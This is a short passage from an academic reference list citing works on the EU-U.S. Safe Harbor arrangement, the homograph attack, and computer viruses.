Farrell, H. (2003). Constructing the International Foundations of E-Commerce—The EU-U.S. Safe Harbor
Arrangement. International Organization, 57(2), 277-306. doi:10.1017/S0020818303572022
Gabrilovich, E., & Gontmakher, A. (2002). The Homograph Attack. Communications of the ACM, 45(2),
128.
Gordon, S. (1999, June). Viruses in the Information Age. Retrieved from Virus Bulletin:
http://www.badguys.org/vb3part.htm